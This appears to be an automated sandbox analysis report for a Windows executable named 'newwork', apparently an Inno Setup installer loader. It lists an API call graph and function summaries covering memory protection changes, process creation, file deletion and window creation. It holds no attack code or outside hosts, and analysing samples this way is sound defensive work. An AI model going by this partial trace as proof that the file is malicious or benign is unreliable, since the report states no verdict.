5684->5685 5686 40560b 5685->5686 5687 405cf4 GetVersionExA 5686->5687 5688 405d0b 5687->5688 5688->5457 5690 405233 5689->5690 5691 405245 5689->5691 5692 403278 18 API calls 5690->5692 5693 40322c 4 API calls 5691->5693 5694 405243 5692->5694 5693->5694 5694->5635 5696 405274 5695->5696 5696->5643 5698 403230 5697->5698 5699 403252 5698->5699 5700 4025ac 4 API calls 5698->5700 5699->5673 5700->5699 5705 403414 5701->5705 5704 406fee 5704->5517 5706 403418 LoadLibraryA 5705->5706 5706->5704 5708 406af0 18 API calls 5707->5708 5709 406bf3 5708->5709 5710 406c05 5709->5710 5711 406af0 18 API calls 5709->5711 5712 403198 4 API calls 5710->5712 5711->5709 5713 406c1a 5712->5713 5713->5529 5715 407578 5714->5715 5716 4075b7 CreateFileA 5715->5716 5716->5551 5718 403414 5717->5718 5719 4075b7 CreateFileA 5718->5719 5719->5551 5721 407cd3 5720->5721 5723 407cc8 5720->5723 5726 407c5c 5721->5726 5723->5587 5725 405890 18 API calls 5725->5723 5727 407c70 5726->5727 5728 407caf 5726->5728 5727->5728 5730 407bac 5727->5730 5728->5723 5728->5725 5731 407bb7 5730->5731 5735 407bc8 5730->5735 5732 405890 18 API calls 5731->5732 5732->5735 5733 4074a0 34 API calls 5734 407bdc 5733->5734 5736 4074a0 34 API calls 5734->5736 5735->5733 5737 407bfd 5736->5737 5738 407918 InterlockedExchange 5737->5738 5739 407c12 5738->5739 5740 407c28 5739->5740 5741 405890 18 API calls 5739->5741 5740->5727 5741->5740 5743 402598 5742->5743 5745 4025a2 5742->5745 5748 401fd4 5743->5748 5744 40259e 5744->5745 5746 403154 4 API calls 5744->5746 5745->5615 5745->5745 5746->5745 5749 401fe8 5748->5749 5750 401fed 5748->5750 5759 401918 RtlInitializeCriticalSection 5749->5759 5752 402012 RtlEnterCriticalSection 5750->5752 5753 40201c 5750->5753 5756 401ff1 5750->5756 5752->5753 5753->5756 5766 401ee0 5753->5766 5756->5744 5757 402147 5757->5744 5758 40213d RtlLeaveCriticalSection 5758->5757 5760 40193c RtlEnterCriticalSection 5759->5760 5761 401946 5759->5761 5760->5761 5762 401964 LocalAlloc 5761->5762 5763 40197e 5762->5763 5764 4019c3 RtlLeaveCriticalSection 5763->5764 5765 4019cd 5763->5765 5764->5765 5765->5750 5769 401ef0 5766->5769 5767 401f1c 5771 401f40 5767->5771 5777 401d00 5767->5777 5769->5767 5769->5771 5772 401e58 5769->5772 5771->5757 5771->5758 5781 4016d8 5772->5781 5775 401e75 5775->5769 5778 401d4e 5777->5778 5779 401d1e 5777->5779 5778->5779 5850 401c68 5778->5850 5779->5771 5784 4016f4 5781->5784 5783 4016fe 5806 4015c4 5783->5806 5784->5783 5786 40175b 5784->5786 5788 40174f 5784->5788 5798 401430 5784->5798 5810 40132c 5784->5810 5786->5775 5791 401dcc 5786->5791 5814 40150c 5788->5814 5789 40170a 5789->5786 5824 401d80 5791->5824 5794 40132c LocalAlloc 5795 401df0 5794->5795 5797 401df8 5795->5797 5828 401b44 5795->5828 5797->5775 5799 40143f VirtualAlloc 5798->5799 5801 40146c 5799->5801 5802 40148f 5799->5802 5818 4012e4 5801->5818 5802->5784 5805 40147c VirtualFree 5805->5802 5808 40160a 5806->5808 5807 40163a 5807->5789 5808->5807 5809 401626 VirtualAlloc 5808->5809 5809->5807 5809->5808 5811 401348 5810->5811 5812 4012e4 LocalAlloc 5811->5812 5813 40138f 5812->5813 5813->5784 5817 40153b 5814->5817 5815 401594 5815->5786 5816 401568 VirtualFree 5816->5817 5817->5815 5817->5816 5821 40128c 5818->5821 5822 401298 LocalAlloc 5821->5822 5823 4012aa 5821->5823 5822->5823 5823->5802 5823->5805 5825 401d89 5824->5825 5827 401d92 5824->5827 5825->5827 5833 401b74 5825->5833 5827->5794 5829 401b61 5828->5829 5830 401b52 5828->5830 5829->5797 5831 401d00 9 API calls 5830->5831 5832 401b5f 5831->5832 5832->5797 5836 40215c 5833->5836 5835 401b95 5835->5827 5837 40217a 5836->5837 5838 402175 5836->5838 5840 4021ab RtlEnterCriticalSection 5837->5840 5841 40217e 5837->5841 5848 4021b5 5837->5848 5839 401918 4 API calls 5838->5839 5839->5837 5840->5848 5841->5835 5842 4021c1 5844 4022e3 RtlLeaveCriticalSection 5842->5844 5845 4022ed 5842->5845 5843 402244 5843->5841 5846 401d80 7 API calls 5843->5846 5844->5845 5845->5835 5846->5841 5847 402270 5847->5842 5849 401d00 7 API calls 5847->5849 5848->5842 5848->5843 5848->5847 5849->5842 5851 401c7a 5850->5851 5852 401c9d 5851->5852 5853 401caf 5851->5853 5863 40188c 5852->5863 5855 40188c 3 API calls 5853->5855 5856 401cad 5855->5856 5857 401b44 9 API calls 5856->5857 5862 401cc5 5856->5862 5858 401cd4 5857->5858 5859 401cee 5858->5859 5873 401b98 5858->5873 5878 4013a0 5859->5878 5862->5779 5864 4018b2 5863->5864 5872 40190b 5863->5872 5882 401658 5864->5882 5867 40132c LocalAlloc 5868 4018cf 5867->5868 5869 40150c VirtualFree 5868->5869 5870 4018e6 5868->5870 5869->5870 5871 4013a0 LocalAlloc 5870->5871 5870->5872 5871->5872 5872->5856 5874 401bab 5873->5874 5875 401b9d 5873->5875 5874->5859 5876 401b74 9 API calls 5875->5876 5877 401baa 5876->5877 5877->5859 5879 4013ab 5878->5879 5880 4012e4 LocalAlloc 5879->5880 5881 4013c6 5879->5881 5880->5881 5881->5862 5884 40168f 5882->5884 5883 4016cf 5883->5867 5884->5883 5885 4016a9 VirtualFree 5884->5885 5885->5884 6842 402dfa 6843 402e26 6842->6843 6844 402e0d 6842->6844 6846 402ba4 6844->6846 6847 402bc9 6846->6847 6848 402bad 6846->6848 6847->6843 6849 402bb5 RaiseException 6848->6849 6849->6847 6850 4075fa GetFileSize 6851 407626 6850->6851 6852 407616 GetLastError 6850->6852 6852->6851 6853 40761f 6852->6853 6854 40748c 35 API calls 6853->6854 6854->6851 6855 406ffb 6856 407008 SetErrorMode 6855->6856 6524 403a80 CloseHandle 6525 403a90 6524->6525 6526 403a91 GetLastError 6524->6526 6527 404283 6528 4042c3 6527->6528 6529 403154 4 API calls 6528->6529 6530 404323 6529->6530 6857 404185 6858 4041ff 6857->6858 6859 4041cc 6858->6859 6860 403154 4 API calls 6858->6860 6861 404323 6860->6861 6531 403e87 6532 403e4c 6531->6532 6533 403e67 6532->6533 6534 403e62 6532->6534 6535 403e7b 6532->6535 6538 403e78 6533->6538 6544 402674 6533->6544 6540 403cc8 6534->6540 6537 402674 4 API calls 6535->6537 6537->6538 6541 403cd6 6540->6541 6542 402674 4 API calls 6541->6542 6543 403ceb 6541->6543 6542->6543 6543->6533 6545 403154 4 API calls 6544->6545 6546 40267a 6545->6546 6546->6538 6555 407e90 6556 407eb8 VirtualFree 6555->6556 6557 407e9d 6556->6557 6560 403e95 6561 403e4c 6560->6561 6562 403e67 6561->6562 6563 403e62 6561->6563 6564 403e7b 6561->6564 6567 403e78 6562->6567 6568 402674 4 API calls 6562->6568 6565 403cc8 4 API calls 6563->6565 6566 402674 4 API calls 6564->6566 6565->6562 6566->6567 6568->6567 6569 40ac97 6578 4096fc 6569->6578 6572 402f24 5 API calls 6573 40aca1 6572->6573 6574 403198 4 API calls 6573->6574 6575 40acc0 6574->6575 6576 403198 4 API calls 6575->6576 6577 40acc8 6576->6577 6587 4056ac 6578->6587 6580 409717 6581 409745 6580->6581 6593 40720c 6580->6593 6584 403198 4 API calls 6581->6584 6583 409735 6586 40973d MessageBoxA 6583->6586 6585 40975a 6584->6585 6585->6572 6585->6573 6586->6581 6588 403154 4 API calls 6587->6588 6589 4056b1 6588->6589 6590 4056c9 6589->6590 6591 403154 4 API calls 6589->6591 6590->6580 6592 4056bf 6591->6592 6592->6580 6594 4056ac 4 API calls 6593->6594 6595 40721b 6594->6595 6596 407221 6595->6596 6597 40722f 6595->6597 6598 40322c 4 API calls 6596->6598 6599 40724b 6597->6599 6600 40723f 6597->6600 6602 40722d 6598->6602 6611 4032b8 6599->6611 6604 4071d0 6600->6604 6602->6583 6605 40322c 4 API calls 6604->6605 6606 4071df 6605->6606 6607 4071fc 6606->6607 6608 406950 CharPrevA 6606->6608 6607->6602 6609 4071eb 6608->6609 6609->6607 6610 4032fc 18 API calls 6609->6610 6610->6607 6612 403278 18 API calls 6611->6612 6613 4032c2 6612->6613 6613->6602 6614 403a97 6615 403aac 6614->6615 6616 403bbc GetStdHandle 6615->6616 6617 403b0e CreateFileA 6615->6617 6626 403ab2 6615->6626 6618 403c17 GetLastError 6616->6618 6631 403bba 6616->6631 6617->6618 6619 403b2c 6617->6619 6618->6626 6621 403b3b GetFileSize 6619->6621 6619->6631 6621->6618 6622 403b4e SetFilePointer 6621->6622 6622->6618 6627 403b6a ReadFile 6622->6627 6623 403be7 GetFileType 6625 403c02 CloseHandle 6623->6625 6623->6626 6625->6626 6627->6618 6628 403b8c 6627->6628 6629 403b9f SetFilePointer 6628->6629 6628->6631 6629->6618 6630 403bb0 SetEndOfFile 6629->6630 6630->6618 6630->6631 6631->6623 6631->6626 6636 40aaa2 6637 40aad2 6636->6637 6638 40aadc CreateWindowExA SetWindowLongA 6637->6638 6639 405194 33 API calls 6638->6639 6640 40ab5f 6639->6640 6641 4032fc 18 API calls 6640->6641 6642 40ab6d 6641->6642 6643 4032fc 18 API calls 6642->6643 6644 40ab7a 6643->6644 6645 406b7c 19 API calls 6644->6645 6646 40ab86 6645->6646 6647 4032fc 18 API calls 6646->6647 6648 40ab8f 6647->6648 6649 4099ec 43 API calls 6648->6649 6650 40aba1 6649->6650 6651 40abb4 6650->6651 6652 4098cc 19 API calls 6650->6652 6653 40abed 6651->6653 6654 4094d8 9 API calls 6651->6654 6652->6651 6655 40ac06 6653->6655 6658 40ac00 RemoveDirectoryA 6653->6658 6654->6653 6656 40ac1a 6655->6656 6657 40ac0f DestroyWindow 6655->6657 6659 40ac42 6656->6659 6660 40357c 4 API calls 6656->6660 6657->6656 6658->6655 6661 40ac38 6660->6661 6662 4025ac 4 API calls 6661->6662 6662->6659 6874 405ba2 6876 405ba4 6874->6876 6875 405be0 6879 405940 19 API calls 6875->6879 6876->6875 6877 405bf7 6876->6877 6878 405bda 6876->6878 6883 404cdc 19 API calls 6877->6883 6878->6875 6880 405c4c 6878->6880 6881 405bf3 6879->6881 6882 4059b0 33 API calls 6880->6882 6884 403198 4 API calls 6881->6884 6882->6881 6885 405c20 6883->6885 6886 405c86 6884->6886 6887 4059b0 33 API calls 6885->6887 6887->6881 6888 408da4 6889 408dc8 6888->6889 6890 408c80 18 API calls 6889->6890 6891 408dd1 6890->6891 6663 402caa 6664 403154 4 API calls 6663->6664 6665 402caf 6664->6665 6906 4011aa 6907 4011ac GetStdHandle 6906->6907 6666 4028ac 6667 402594 18 API calls 6666->6667 6668 4028b6 6667->6668 4978 40aab4 4979 40aab8 SetLastError 4978->4979 5010 409648 GetLastError 4979->5010 4982 40aad2 4984 40aadc CreateWindowExA SetWindowLongA 4982->4984 5023 405194 4984->5023 4988 40ab6d 4989 4032fc 18 API calls 4988->4989 4990 40ab7a 4989->4990 5040 406b7c GetCommandLineA 4990->5040 4993 4032fc 18 API calls 4994 40ab8f 4993->4994 5045 4099ec 4994->5045 4996 40aba1 4998 40abb4 4996->4998 5066 4098cc 4996->5066 4999 40abd4 4998->4999 5000 40abed 4998->5000 5072 4094d8 4999->5072 5002 40ac06 5000->5002 5005 40ac00 RemoveDirectoryA 5000->5005 5003 40ac1a 5002->5003 5004 40ac0f DestroyWindow 5002->5004 5006 40ac42 5003->5006 5080 40357c 5003->5080 5004->5003 5005->5002 5008 40ac38 5093 4025ac 5008->5093 5097 404c94 5010->5097 5018 4096c3 5112 4031b8 5018->5112 5024 4051a8 33 API calls 5023->5024 5025 4051a3 5024->5025 5026 4032fc 5025->5026 5027 403300 5026->5027 5028 40333f 5026->5028 5029 4031e8 5027->5029 5030 40330a 5027->5030 5028->4988 5036 403254 18 API calls 5029->5036 5037 4031fc 5029->5037 5031 403334 5030->5031 5032 40331d 5030->5032 5035 4034f0 18 API calls 5031->5035 5273 4034f0 5032->5273 5033 403228 5033->4988 5039 403322 5035->5039 5036->5037 5037->5033 5038 4025ac 4 API calls 5037->5038 5038->5033 5039->4988 5299 406af0 5040->5299 5042 406ba1 5043 403198 4 API calls 5042->5043 5044 406bbf 5043->5044 5044->4993 5313 4033b4 5045->5313 5047 409a27 5048 409a59 CreateProcessA 5047->5048 5049 409a65 5048->5049 5050 409a6c CloseHandle 5048->5050 5051 409648 35 API calls 5049->5051 5052 409a75 5050->5052 5051->5050 5053 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5052->5053 5054 409a7a MsgWaitForMultipleObjects 5053->5054 5054->5052 5055 409a91 5054->5055 5056 4099c0 TranslateMessage DispatchMessageA PeekMessageA 5055->5056 5057 409a96 GetExitCodeProcess CloseHandle 5056->5057 5058 409ab6 5057->5058 5059 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5058->5059 5060 409abe 5059->5060 5060->4996 5061 402f24 5062 403154 4 API calls 5061->5062 5063 402f29 5062->5063 5319 402bcc 5063->5319 5065 402f51 5065->5065 5067 40990e 5066->5067 5068 4098d4 5066->5068 5067->4998 5068->5067 5069 403420 18 API calls 5068->5069 5070 409908 5069->5070 5322 408e80 5070->5322 5073 409532 5072->5073 5077 4094eb 5072->5077 5073->5000 5074 4094f3 Sleep 5074->5077 5075 409503 Sleep 5075->5077 5077->5073 5077->5074 5077->5075 5078 40951a GetLastError 5077->5078 5345 408fbc 5077->5345 5078->5073 5079 409524 GetLastError 5078->5079 5079->5073 5079->5077 5083 403591 5080->5083 5089 4035a0 5080->5089 5081 4035b1 5084 403198 4 API calls 5081->5084 5082 4035b8 5085 4031b8 4 API calls 5082->5085 5086 4035d0 5083->5086 5087 40359b 5083->5087 5088 4035b6 5083->5088 5084->5088 5085->5088 5086->5088 5091 40357c 4 API calls 5086->5091 5087->5089 5090 4035ec 5087->5090 5088->5008 5089->5081 5089->5082 5090->5088 5362 403554 5090->5362 5091->5086 5094 4025b0 5093->5094 5095 4025ba 5093->5095 5094->5095 5096 403154 4 API calls 5094->5096 5095->5006 5095->5095 5096->5095 5120 4051a8 5097->5120 5100 407284 FormatMessageA 5101 4072aa 5100->5101 5102 403278 18 API calls 5101->5102 5103 4072c7 5102->5103 5104 408da8 5103->5104 5105 408dc8 5104->5105 5263 408c80 5105->5263 5108 405890 5109 405897 5108->5109 5110 4031e8 18 API calls 5109->5110 5111 4058af 5110->5111 5111->5018 5114 4031be 5112->5114 5113 4031e3 5116 403198 5113->5116 5114->5113 5115 4025ac 4 API calls 5114->5115 5115->5114 5117 4031b7 5116->5117 5118 40319e 5116->5118 5117->4982 5117->5061 5118->5117 5119 4025ac 4 API calls 5118->5119 5119->5117 5121 4051c5 5120->5121 5128 404e58 5121->5128 5124 4051f1 5133 403278 5124->5133 5131 404e73 5128->5131 5129 404e85 5129->5124 5138 404be4 5129->5138 5131->5129 5141 404f7a 5131->5141 5148 404e4c 5131->5148 5134 403254 18 API calls 5133->5134 5135 403288 5134->5135 5136 403198 4 API calls 5135->5136 5137 4032a0 5136->5137 5137->5100 5255 405940 5138->5255 5140 404bf5 5140->5124 5142 404f8b 5141->5142 5146 404fd9 5141->5146 5145 40505f 5142->5145 5142->5146 5144 404ff7 5144->5131 5145->5144 5155 404e38 5145->5155 5146->5144 5151 404df4 5146->5151 5149 403198 4 API calls 5148->5149 5150 404e56 5149->5150 5150->5131 5152 404e02 5151->5152 5158 404bfc 5152->5158 5154 404e30 5154->5146 5185 4039a4 5155->5185 5161 4059b0 5158->5161 5160 404c15 5160->5154 5162 4059be 5161->5162 5171 404cdc LoadStringA 5162->5171 5165 405194 33 API calls 5166 4059f6 5165->5166 5174 4031e8 5166->5174 5169 4031b8 4 API calls 5170 405a1b 5169->5170 5170->5160 5172 403278 18 API calls 5171->5172 5173 404d09 5172->5173 5173->5165 5175 4031ec 5174->5175 5178 4031fc 5174->5178 5175->5178 5180 403254 5175->5180 5176 403228 5176->5169 5178->5176 5179 4025ac 4 API calls 5178->5179 5179->5176 5181 403274 5180->5181 5182 403258 5180->5182 5181->5178 5183 402594 18 API calls 5182->5183 5184 403261 5183->5184 5184->5178 5186 4039ab 5185->5186 5191 4038b4 5186->5191 5188 4039cb 5189 403198 4 API calls 5188->5189 5190 4039d2 5189->5190 5190->5144 5192 4038d5 5191->5192 5193 4038c8 5191->5193 5195 403934 5192->5195 5196 4038db 5192->5196 5219 403780 5193->5219 5197 403993 5195->5197 5198 40393b 5195->5198 5199 4038e1 5196->5199 5200 4038ee 5196->5200 5201 4037f4 3 API calls 5197->5201 5202 403941 5198->5202 5203 40394b 5198->5203 5226 403894 5199->5226 5205 403894 6 API calls 5200->5205 5208 4038d0 5201->5208 5241 403864 5202->5241 5207 4037f4 3 API calls 5203->5207 5209 4038fc 5205->5209 5210 40395d 5207->5210 5208->5188 5231 4037f4 5209->5231 5213 403864 23 API calls 5210->5213 5212 403917 5237 40374c 5212->5237 5214 403976 5213->5214 5217 40374c VariantClear 5214->5217 5216 40392c 5216->5188 5218 40398b 5217->5218 5218->5188 5220 4037f0 5219->5220 5221 403744 5219->5221 5220->5208 5221->5219 5222 403793 VariantClear 5221->5222 5223 4037ab 5221->5223 5224 403198 4 API calls 5221->5224 5225 4037dc VariantCopyInd 5221->5225 5222->5221 5223->5208 5224->5221 5225->5220 5225->5221 5246 4036b8 5226->5246 5229 40374c VariantClear 5230 4038a9 5229->5230 5230->5208 5232 403845 VariantChangeTypeEx 5231->5232 5233 40380a VariantChangeTypeEx 5231->5233 5236 403832 5232->5236 5234 403826 5233->5234 5235 40374c VariantClear 5234->5235 5235->5236 5236->5212 5238 403759 5237->5238 5239 403766 5237->5239 5238->5239 5240 403779 VariantClear 5238->5240 5239->5216 5240->5216 5252 40369c SysStringLen 5241->5252 5244 40374c VariantClear 5245 403882 5244->5245 5245->5208 5247 4036cb 5246->5247 5248 403706 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5247->5248 5249 4036db 5247->5249 5250 40372e 5248->5250 5251 4036ed MultiByteToWideChar SysAllocStringLen 5249->5251 5250->5229 5251->5250 5253 403610 21 API calls 5252->5253 5254 4036b3 5253->5254 5254->5244 5256 40594c 5255->5256 5257 404cdc 19 API calls 5256->5257 5258 405972 5257->5258 5259 4031e8 18 API calls 5258->5259 5260 40597d 5259->5260 5261 403198 4 API calls 5260->5261 5262 405992 5261->5262 5262->5140 5264 403198 4 API calls 5263->5264 5266 408cb1 5263->5266 5264->5266 5265 4031b8 4 API calls 5267 408d69 5265->5267 5268 408cc8 5266->5268 5269 403278 18 API calls 5266->5269 5271 408cdc 5266->5271 5272 4032fc 18 API calls 5266->5272 5267->5108 5270 4032fc 18 API calls 5268->5270 5269->5266 5270->5271 5271->5265 5272->5266 5274 4034fd 5273->5274 5281 40352d 5273->5281 5276 403526 5274->5276 5279 403509 5274->5279 5275 403198 4 API calls 5278 403517 5275->5278 5277 403254 18 API calls 5276->5277 5277->5281 5278->5039 5282 4025c4 5279->5282 5281->5275 5284 4025ca 5282->5284 5283 4025dc 5283->5278 5283->5283 5284->5283 5286 403154 5284->5286 5287 403164 5286->5287 5288 40318c TlsGetValue 5286->5288 5287->5283 5289 403196 5288->5289 5290 40316f 5288->5290 5289->5283 5294 40310c 5290->5294 5292 403174 TlsGetValue 5293 403184 5292->5293 5293->5283 5295 403120 LocalAlloc 5294->5295 5296 403116 5294->5296 5297 40313e TlsSetValue 5295->5297 5298 403132 5295->5298 5296->5295 5297->5298 5298->5292 5300 406b1c 5299->5300 5301 403278 18 API calls 5300->5301 5302 406b29 5301->5302 5309 403420 5302->5309 5304 406b31 5305 4031e8 18 API calls 5304->5305 5306 406b49 5305->5306 5307 403198 4 API calls 5306->5307 5308 406b6b 5307->5308 5308->5042 5310 403426 5309->5310 5312 403437 5309->5312 5311 403254 18 API calls 5310->5311 5310->5312 5311->5312 5312->5304 5314 4033bc 5313->5314 5315 403254 18 API calls 5314->5315 5316 4033cf 5315->5316 5317 4031e8 18 API calls 5316->5317 5318 4033f7 5317->5318 5320 402bd5 RaiseException 5319->5320 5321 402be6 5319->5321 5320->5321 5321->5065 5323 408e8e 5322->5323 5325 408ea6 5323->5325 5335 408e18 5323->5335 5326 408e18 18 API calls 5325->5326 5327 408eca 5325->5327 5326->5327 5338 407918 5327->5338 5329 408ee5 5330 408e18 18 API calls 5329->5330 5332 408ef8 5329->5332 5330->5332 5331 408e18 18 API calls 5331->5332 5332->5331 5333 403278 18 API calls 5332->5333 5334 408f27 5332->5334 5333->5332 5334->5067 5336 405890 18 API calls 5335->5336 5337 408e29 5336->5337 5337->5325 5341 4078c4 5338->5341 5342 4078d6 5341->5342 5343 4078e7 5341->5343 5344 4078db InterlockedExchange 5342->5344 5343->5329 5344->5343 5353 408f70 5345->5353 5347 408fd2 5348 408fd6 5347->5348 5349 408ff2 DeleteFileA GetLastError 5347->5349 5348->5077 5350 409010 5349->5350 5359 408fac 5350->5359 5354 408f7a 5353->5354 5355 408f7e 5353->5355 5354->5347 5356 408fa0 SetLastError 5355->5356 5357 408f87 Wow64DisableWow64FsRedirection 5355->5357 5358 408f9b 5356->5358 5357->5358 5358->5347 5360 408fb1 Wow64RevertWow64FsRedirection 5359->5360 5361 408fbb 5359->5361 5360->5361 5361->5077 5363 403566 5362->5363 5365 403578 5363->5365 5366 403604 5363->5366 5365->5090 5367 40357c 5366->5367 5372 40359b 5367->5372 5373 4035d0 5367->5373 5374 4035a0 5367->5374 5378 4035b6 5367->5378 5368 4035b1 5370 403198 4 API calls 5368->5370 5369 4035b8 5371 4031b8 4 API calls 5369->5371 5370->5378 5371->5378 5372->5374 5375 4035ec 5372->5375 5376 40357c 4 API calls 5373->5376 5373->5378 5374->5368 5374->5369 5377 403554 4 API calls 5375->5377 5375->5378 5376->5373 5377->5375 5378->5363 6669 401ab9 6670 401a96 6669->6670 6671 401aa9 RtlDeleteCriticalSection 6670->6671 6672 401a9f RtlLeaveCriticalSection 6670->6672 6672->6671

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 116 409b78-409b9c GetSystemInfo VirtualQuery 117 409ba2 116->117 118 409c2c-409c33 116->118 119 409c21-409c26 117->119 119->118 120 409ba4-409bab 119->120 121 409c0d-409c1f VirtualQuery 120->121 122 409bad-409bb1 120->122 121->118 121->119 122->121 123 409bb3-409bbb 122->123 124 409bcc-409bdd VirtualProtect 123->124 125 409bbd-409bc0 123->125 127 409be1-409be3 124->127 128 409bdf 124->128 125->124 126 409bc2-409bc5 125->126 126->124 129 409bc7-409bca 126->129 130 409bf2-409bf5 127->130 128->127 129->124 129->127 131 409be5-409bee call 409b70 130->131 132 409bf7-409bf9 130->132 131->130 132->121 134 409bfb-409c08 VirtualProtect 132->134 134->121
                                                                                        APIs
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 00409B8A
                                                                                        • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B95
                                                                                        • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BD6
                                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409C08
                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409C18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                        • String ID:
                                                                                        • API String ID: 2441996862-0
                                                                                        • Opcode ID: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction ID: 4a1d84bb43d4a47cf168f169447d483ed62c711ee8ccb48f5bfbfd053dbeaed9
                                                                                        • Opcode Fuzzy Hash: 69cc1b0b9b744b29044eea84e4744ba7a66f7205e02ae19cc0529fdcfa929845
                                                                                        • Instruction Fuzzy Hash: D421A1B16043006BDA309AA99C85E57B7E8AF45360F144C2BFA99E72C3D239FC40C669
                                                                                        APIs
                                                                                        • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale
                                                                                        • String ID:
                                                                                        • API String ID: 2299586839-0
                                                                                        • Opcode ID: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction ID: 1248db9972fbf410c55bf070b604c98f5d62b90992f8f49b6b6440a9954d2c50
                                                                                        • Opcode Fuzzy Hash: 08facca5f8c818d7ae0117448837c5e97f15c9e55cb3aedc2694e0bc5091a832
                                                                                        • Instruction Fuzzy Hash: E2E0927170021427D710A9A99C86AEB725CEB58310F0002BFB904E73C6EDB49E804AED

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040A618), ref: 00404582
                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                        • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,0040A618), ref: 004045C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$HandleModulePolicyProcess
                                                                                        • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                        • API String ID: 3256987805-3653653586
                                                                                        • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                        • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                        • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                          • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02092474), ref: 0040966C
                                                                                        • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                        • SetWindowLongA.USER32(0001041E,000000FC,00409960), ref: 0040AB15
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                        • DestroyWindow.USER32(0001041E,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                        • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                        • API String ID: 3757039580-3001827809
